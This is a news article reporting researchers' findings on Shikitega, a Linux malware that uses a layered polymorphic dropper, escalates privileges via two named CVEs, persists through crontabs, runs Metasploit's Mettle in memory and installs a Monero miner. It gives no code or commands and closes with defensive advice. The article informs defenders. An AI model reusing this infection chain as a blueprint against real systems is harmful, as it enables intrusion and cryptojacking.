Skip to content

Shikitega Linux malware uses multi-stage deployment to avoid detection

  • by
  • 3 min read

Researchers at AT&T Alien Labs have discovered a new Linux malware known as Shikitega. The malware targets computers and IoT devices and exploits vulnerabilities in the Linux system to elevate privileges, add persistence and launch a crypto miner on the target system. 

The malware uses a polymorphic encoder to evade detection by making static, signature-based detection virtually impossible. Furthermore, it downloads and executes Metasploit’s “Mettle” meterpreter to maximise control over infected devices and abuses legitimate cloud services to store its command and control servers. 

Metasploit is a popular penetration testing suite often found bundled with specialised operating systems like Kali Linux. Its uses often include creating malicious payloads for pretty much everything under the sun, including Linux devices and Android phones.

In the News: Ransomware gangs move to partial encryption to avoid detection

A layered infection chain

According to the researchers, Shikitega uses a multi-layer infection chain. The first step only contains a few hundred bytes and is divided into modules, each responsible for a specific task including downloading and executing the Metasploit meterpreter, exploiting Linux vulnerabilities (CVE-2021-4034 and CVE-2021-3493) to escalate privileges, setting persistence in the infected machine using Cron and finally downloading and executing a crypto miner. 

Shikitega Linux malware uses multi-stage deployment to avoid detection
The Shikitega malware infection chain. | Source: AT&T Cybersecurity

The main dropper is a small ELF file about 370 bytes in size. The actual code is even smaller coming in at around 300 bytes. It derives its name from the “Shikata Ga Nai” polymorphic XOR additive feedback encoder. This allows the malware to run in looped stages where each loop decodes the next stage until the final payload is decoded and executed. 

Once execution is complete, the C&C server kicks in with additional shell command to execute on the target machine. This involves downloading additional files from the server that are executed from the memory only. These files aren’t saved in the hard drive, further minimising detection chances. 

The malicious ELF file with the payload and ELF header. | Source: AT&T Cybersecurity

As for persistence, the malware downloads and executes five different shell scripts and persists in the system by setting four crontabs — two for the currently logged-in user and two for the root user. The malware even checks whether or not the crontab command exists on the system before installing the malicious cron services. Additionally, to ensure that only one instance of the malware runs at any given time, it uses flock with a lock file.

Finally, the malware downloads and executes the XMRing miner (version 6.17.0), a popular miner for Monero. It also sets an additional crontab to download and execute the crypto miner for the C&C server. 

The researchers have recommended keeping software up to date, having antivirus or EDR installed in all endpoints and using a backup system to backup server files as recommended actions. That said, the malware is still expected to be a major headache for some time. 

In the News: Indian government to crackdown on illegal loan apps in the country

Yadullah Abidi

Yadullah is a Computer Science graduate who writes/edits/shoots/codes all things cybersecurity, gaming, and tech hardware. When he's not, he streams himself racing virtual cars. He's been writing and reporting on tech and cybersecurity with websites like Candid.Technology and MakeUseOf since 2018. You can contact him here:

Exit mobile version